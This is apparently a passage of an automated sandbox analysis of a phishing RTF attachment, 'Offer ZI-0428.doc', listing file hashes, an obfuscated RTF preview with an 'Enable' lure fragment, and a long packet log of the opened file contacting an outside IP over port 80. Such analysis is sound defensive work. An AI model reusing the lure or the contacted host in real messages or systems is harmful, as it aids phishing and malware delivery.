                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                        File Type:data
                        Category:dropped
                        Size (bytes):162
                        Entropy (8bit):2.4797606462020307
                        Encrypted:false
                        SSDEEP:3:vrJlaCkWtVygGlTJbyL0KllVMWpxi/NctOlln:vdsCkWthKKXxitl
                        MD5:23BAE74EC6AC87E5A629AAB97C6FED07
                        SHA1:A1EE321EAD9491E2401D3725985F7681DBC0EC5A
                        SHA-256:0C2909E4EE83AF17A6320F1DAB9F2D1BA5C4C001972DAB07C7F092B081564E9D
                        SHA-512:197A202D4AE7DD5D171CA60DBAA3E08492FF38200DF7DBF285BAA718D2E85D4533B99397D70D17BEFC5C87FE131AFD893970121032E24197D40AE19B0036FF43
                        Malicious:false
                        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                        Static File Info

                        General

                        File type:Rich Text Format data, version 1
                        Entropy (8bit):3.646006732333623
                        TrID:
                        • Rich Text Format (5005/1) 55.56%
                        • Rich Text Format (4004/1) 44.44%
                        File name:Offer ZI-0428.doc
                        File size:300'804 bytes
                        MD5:dde9d7d091ac0cc1d35515d259d8ca6f
                        SHA1:c6e943143771fc3fd7c2c548f5fddcd6013d9302
                        SHA256:95be57795b850e5aa098c80a107bafdb581da7653d9b57b8f2d37b89880de224
                        SHA512:04f282c1b0333925454b7ab1c461c4ae395b0b8148bc6d51fd36368db2dc187daa6d273177d4ad15b50ede52bacf6271062dab70d45b871c8f805a8083844995
                        SSDEEP:6144:4GuqGuqGuqGuqGuqGuqGuqGuqGuqGu9tNcTr:4
                        TLSH:8954D26DD34B02598F620337AB571E5142BDBA6EF38552B1306C537933DAC3CA2252BE
                        File Content Preview:{\rtf1..{\*\kyK4YPbgZxNLzqWfwUOxZET5OPKboZs7z0l0wZ6EpZQVWAsiUngVozpCZL1xOqw9ELcxZIALbqk8w3lPLOKBrZwG7SRPwTFh8ynCZ7BoZoEUP2aWBKFIrVD5gnUFcxCaKxC07ZaQNVnr5flqebM7zL5QuM3jarDYTIjfMAlwgxMW7ShAOHYwObv4SB49zffOF3ISSS7A9Bnlgwn}..{\931642467please click Enable ed

                        File Icon

                        Icon Hash:2764a3aaaeb7bdbf

                        Static RTF Info

                        Objects

                        IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                        000015E55hno

                        Network Behavior

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Jul 1, 2024 13:58:01.151169062 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.156018972 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.156196117 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.156550884 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.162249088 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.770646095 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.770714998 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.770757914 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.770792961 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.770795107 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.770795107 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.770828009 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.770863056 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.770886898 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.770899057 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.770930052 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.770944118 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.770944118 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.770962954 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.770982981 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.770999908 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.771027088 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.771064043 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.775934935 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.775990963 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.776011944 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.776026011 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:01.776056051 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.776108027 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:01.777789116 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.057893991 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.057933092 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.057981968 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.057985067 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058020115 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058027029 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058053970 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058070898 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058070898 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058089018 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058110952 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058123112 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058150053 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058163881 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058229923 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058229923 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058237076 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058270931 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058298111 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058303118 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058322906 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058336973 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058366060 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058391094 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058396101 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058424950 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058453083 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058459997 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058521032 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058521032 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058521986 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058554888 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058578968 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058599949 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058607101 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058640003 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058671951 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058676958 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058705091 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058737993 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058743954 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058759928 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058772087 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058789015 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058805943 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.058814049 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.058964014 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.062997103 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.063077927 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.063857079 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.063891888 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.063949108 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.064017057 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.064068079 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.064073086 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.064102888 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.064117908 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.064147949 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.064160109 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.064202070 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.064202070 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.064245939 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.064793110 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.064846039 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.064855099 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.064897060 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.064919949 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.064932108 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.064951897 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.064968109 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.064996958 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.065026045 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.065435886 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.065681934 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.065732002 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.065747023 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.065766096 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.065798998 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.065804005 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.065804005 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.065834045 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.065841913 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.065875053 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.066499949 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.066551924 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.066579103 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.066586018 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.066615105 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.066621065 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.066637039 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.066660881 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.066704035 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.067321062 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.067375898 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.067389011 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.067420959 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.067434072 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.067454100 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.067488909 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.067507029 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.067579031 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.068150043 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.068213940 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.068294048 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.068375111 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.068393946 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.068423033 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.068428040 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.068463087 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.068470001 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.068531990 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.068559885 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.068578959 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.069221020 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.069272041 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.069292068 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.069308996 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.069341898 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.069359064 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.069360018 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.069377899 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.069433928 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.070055962 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.070106030 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.070111990 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.070141077 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.070163012 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.070173979 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.070209980 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.070238113 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.070238113 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.070252895 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.070920944 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.070954084 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.070976973 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.070988894 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.071017981 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.071038008 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.071403027 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.071449041 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.071455002 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.071490049 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.071520090 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.071523905 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.071540117 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.071557999 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.071573973 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.071624041 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.072207928 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.072267056 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.072346926 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.072382927 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.072496891 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.072526932 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.072695017 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.072746038 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.072750092 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.072799921 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.072820902 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.072834015 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.072868109 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.072870970 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.072870970 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.072930098 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.073535919 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.073591948 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.073592901 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.073626041 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.073642969 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.073661089 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.073702097 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.073702097 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.074357033 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.074419022 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.074436903 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.074453115 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.074485064 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.074507952 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.074520111 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.074606895 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.074606895 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.075043917 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.075098038 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.075104952 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.075131893 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.075164080 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.075192928 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.075212002 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.075720072 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.075787067 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.075834990 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.075866938 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.075898886 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.075908899 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.075908899 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.075932980 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.075948000 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.076009035 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.076555014 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.076610088 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.076616049 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.076643944 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.076678991 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.076692104 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.076767921 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.076800108 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.076824903 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.076837063 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.076886892 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.076889992 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.076889992 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.076920986 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.076946020 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.076972008 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.076991081 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077008009 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077040911 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077063084 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077063084 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077090979 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077095032 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077126026 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077140093 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077178955 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077197075 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077214003 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077246904 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077249050 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077256918 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077280045 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077301025 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077313900 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077347994 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077399015 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077399015 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077399015 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077682018 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077733994 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077766895 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077816963 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077832937 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077832937 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077852011 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077864885 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077903032 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077908993 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077938080 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077960968 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.077971935 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.077991009 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.078005075 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.078039885 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.078047037 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.078047037 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.078118086 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.079354048 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.079386950 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.079428911 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.079428911 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.079437017 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.079469919 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.079526901 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.079531908 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.079531908 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.079579115 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.079583883 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.079616070 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.079648972 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.079674006 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.079682112 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.079713106 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.079715967 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.079741955 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.079750061 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.079785109 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.079791069 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.079791069 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.079845905 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.080297947 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.080785036 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.080835104 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.080888033 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.080903053 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.080921888 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.080955982 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.080956936 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.080976963 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.080987930 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.081012964 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.081022978 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.081056118 CEST804916431.192.235.145192.168.2.22
                        Jul 1, 2024 13:58:02.081062078 CEST4916480192.168.2.2231.192.235.145
                        Jul 1, 2024 13:58:02.081062078 CEST4916480192.168.2.2231.192.235.145
